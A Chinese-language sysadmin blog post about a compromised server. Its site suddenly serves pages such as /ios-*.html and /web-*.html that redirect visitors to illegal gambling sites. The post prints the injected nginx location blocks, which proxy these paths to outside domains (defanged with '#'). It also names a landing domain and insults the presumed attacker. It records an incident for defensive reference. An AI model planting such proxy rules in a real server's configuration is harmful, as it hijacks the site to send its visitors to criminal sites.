当你的网站出现很多ios或web后缀的html静态非法页面

共计 608 个字符，预计需要花费 2 分钟才能阅读完成。

当你的网站出现很多ios或web后缀的html静态非法页面，例如：/ios-5623196.html 或者 /web-5623196.html这样的页面路径，点开之后会自动跳转到非法赌博网站，那么你的服务器一定是中招了。

如何处理这样的问题呢？

最近在维护服务器的时候发现了这个鸡贼的玩意，竟然是在nginx的配置中进行了跳转，恶意代码如下：

location ^~ /ios {
proxy_pass http://bd#jjggqq#com/http/ios;（不要访问，点用#号代替了）
proxy_set_header X-FORWARDED-HOST $host;
proxy_set_header X-Forwarded-For $remote_addr;
}
location ^~ /web {
proxy_pass http://mm#jjggqq#com/http/web;（不要访问，点用#号代替了）
proxy_set_header X-FORWARDED-HOST $host;
proxy_set_header X-Forwarded-For $remote_addr;
}

对于此行为恶意跳转到https://g4pvj#tech/（不要访问，点用#号代替了），那么这个承接的域名也必然是其进行违法活动的其中一个。

此域名是由吉林省的一个吊毛搞的，懒得继续扒他，但也要让他付出代价！

以上是碰到的日常运维中恶心的吊毛的应对方法，做个记录，以便后续参考。